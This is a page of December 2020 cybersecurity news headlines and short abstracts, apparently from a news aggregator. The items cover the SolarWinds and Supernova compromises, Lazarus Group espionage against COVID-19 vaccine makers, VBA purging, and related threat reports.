The top U.S. cybersecurity agency said that an extensive campaign that gave hackers access to networks at several federal agencies is also "impacting" state and local governments.The Hill
December 23, 2020
Lazarus Group Hits COVID-19 Vaccine-Maker in Espionage Attack Full Text
Abstract
The nation-state actor is looking to speed up vaccine development efforts in North Korea.Threatpost
December 23, 2020
Lazarus Attacks Vaccine Research Full Text
Abstract
APT group Lazarus attacks two targets related to COVID-19 vaccine researchInfosecurity Magazine
December 23, 2020
Cellebrite claims to be able to access Signal messages Full Text
Abstract
Israeli cyber security firm Cellebrite claims that it can decrypt messages from the popular Signal's messaging app. Israeli security firm Cellebrite has claimed that it can decrypt messages from the Signal highly secure messaging app. The BBC reported...Security Affairs
December 23, 2020
Lazarus covets COVID-19-related intelligence Full Text
Abstract
While tracking the Lazarus group’s campaigns targeting various industries, Kaspersky found that they recently went after COVID-19-related entities, including a pharma firm and a government ministry.Kaspersky Labs
December 22, 2020
Threat Actors Increasingly Using VBA Purging in Attacks Full Text
Abstract
Initially detailed in February 2020, VBA purging involves the use of VBA source code only within Office documents, instead of the typically compiled code, and ensures better detection evasion.Security Week
December 22, 2020
Patrick Wardle on Hackers Leveraging ‘Powerful’ iOS Bugs in High-Level Attacks Full Text
Abstract
Noted Apple security expert Patrick Wardle discusses how cybercriminals are stepping up their game in targeting Apple users with new techniques and cyberattacks.Threatpost
December 22, 2020
A Second Hacker Group May Have Also Breached SolarWinds, Microsoft Says Full Text
Abstract
As the probe into the SolarWinds supply chain attack continues, new digital forensic evidence has brought to light that a separate threat actor may have been abusing the IT infrastructure provider's Orion software to drop a similar persistent backdoor on target systems. "The investigation of the whole SolarWinds compromise led to the discovery of an additional malware that also affects the SolarWinds Orion product but has been determined to be likely unrelated to this compromise and used by a different threat actor," Microsoft 365 research team said on Friday in a post detailing the Sunburst malware. What makes the newly revealed malware, dubbed "Supernova," different is that unlike the Sunburst DLL, Supernova ("app_web_logoimagehandler.ashx.b6031896.dll") is not signed with a legitimate SolarWinds digital certificate, signaling that the compromise may be unrelated to the previously disclosed supply chain attack. In a standalone write-up ,The Hacker News
December 21, 2020
A second hacking group has targeted SolarWinds systems Full Text
Abstract
Security researchers have discovered a second threat actor that has exploited the SolarWinds software to plant Supernova and CosmicGale malware on corporate and government networks.ZDNet
December 21, 2020
Threat Actors Overcome Fingerprint Scanning Technologies For Malicious Intent Full Text
Abstract
Researchers have discovered five new attack techniques, all of which can be launched from zero-permission malicious Android apps, and one can even work against all apps that integrate fingerprint API.Cyware Alerts - Hacker News
December 19, 2020
Hackers last year conducted a ‘dry run’ of SolarWinds breach Full Text
Abstract
Hackers who breached federal agency networks through software made by a company called SolarWinds appear to have conducted a test run of their broad espionage campaign last year, according to sources with knowledge of the operation.Yahoo! Finance
December 18, 2020
Chinese hackers targeted shoppers during Flipkart festive sales Full Text
Abstract
Internet users in India were sent spurious links to click on and participate in a contest where individuals could win an OPPO F17 Pro (Matte Black, 8 GB RAM, 128 GB Storage) smartphone.The Times Of India
December 18, 2020
Hack Suggests New Scope, Sophistication for Cyberattacks Full Text
Abstract
Suspected Russian hack involving SolarWinds software that compromised parts of the U.S. government was executed on a scale that has surprised even veteran security experts.The Wall Street Journal